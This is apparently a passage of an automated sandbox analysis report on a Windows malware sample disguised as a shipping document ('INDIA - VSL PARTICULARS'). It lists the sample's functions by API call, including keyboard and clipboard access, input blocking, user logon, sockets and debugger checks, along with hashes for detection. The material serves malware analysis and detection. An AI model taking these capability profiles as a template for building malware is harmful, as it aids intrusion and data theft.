                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID: pqI
                              • API String ID: 2579439406-2459173057
                              • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                              • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                              • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                              • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                              Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                              Download Yara Rule
                              APIs
                              • __wcsicoll.LIBCMT ref: 00433349
                              • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                              • __wcsicoll.LIBCMT ref: 00433375
                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsicollmouse_event
                              • String ID: DOWN
                              • API String ID: 1033544147-711622031
                              • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                              • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                              • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                              • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                              Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044C3D2
                              • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                              • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                              • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: KeyboardMessagePostState$InputSend
                              • String ID:
                              • API String ID: 3031425849-0
                              • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                              • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                              • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                              • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                              Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                              • socket.WSOCK32(00000002,00000002,00000011), ref: 0047666F
                              • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorLastinet_addrsocket
                              • String ID:
                              • API String ID: 4170576061-0
                              • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                              • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                              • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                              • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                              Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • IsWindowVisible.USER32 ref: 0047A368
                              • IsWindowEnabled.USER32 ref: 0047A378
                              • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                              • IsIconic.USER32 ref: 0047A393
                              • IsZoomed.USER32 ref: 0047A3A1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                              • String ID:
                              • API String ID: 292994002-0
                              • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                              • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                              • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                              • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                              Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                              • CoInitialize.OLE32(00000000), ref: 00478442
                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                              • CoUninitialize.OLE32 ref: 0047863C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                              • String ID: .lnk
                              • API String ID: 886957087-24824748
                              • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                              • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                              • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                              • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                              Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                              Download Yara Rule
                              APIs
                              • OpenClipboard.USER32(?), ref: 0046DCE7
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                              • CloseClipboard.USER32 ref: 0046DD0D
                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                              • CloseClipboard.USER32 ref: 0046DD41
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                              • CloseClipboard.USER32 ref: 0046DD99
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                              • String ID:
                              • API String ID: 15083398-0
                              • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                              • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                              • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                              • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                              Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: U$\
                              • API String ID: 4104443479-100911408
                              • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                              • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                              • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                              • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                              Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstNext
                              • String ID:
                              • API String ID: 3541575487-0
                              • Opcode ID: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                              • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                              • Opcode Fuzzy Hash: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                              • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                              Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                              Download Yara Rule
                              APIs
                              • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                              • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                              • FindClose.KERNEL32(00000000), ref: 004339EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FileFind$AttributesCloseFirst
                              • String ID:
                              • API String ID: 48322524-0
                              • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                              • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                              • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                              • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                              Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                              Download Yara Rule
                              APIs
                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                              • String ID:
                              • API String ID: 901099227-0
                              • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                              • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                              • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                              • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                              Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                              Download Yara Rule
                              APIs
                              • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Proc
                              • String ID:
                              • API String ID: 2346855178-0
                              • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                              • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                              • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                              • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                              Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • BlockInput.USER32(00000001), ref: 0045A38B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: BlockInput
                              • String ID:
                              • API String ID: 3456056419-0
                              • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                              • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                              • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                              • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                              Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                              • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: LogonUser
                              • String ID:
                              • API String ID: 1244722697-0
                              • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                              • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                              • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                              • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                              Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                              Download Yara Rule
                              APIs
                              • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: NameUser
                              • String ID:
                              • API String ID: 2645101109-0
                              • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                              • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                              • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                              • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                              Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                              Download Yara Rule
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                              • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                              • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                              • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                              Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
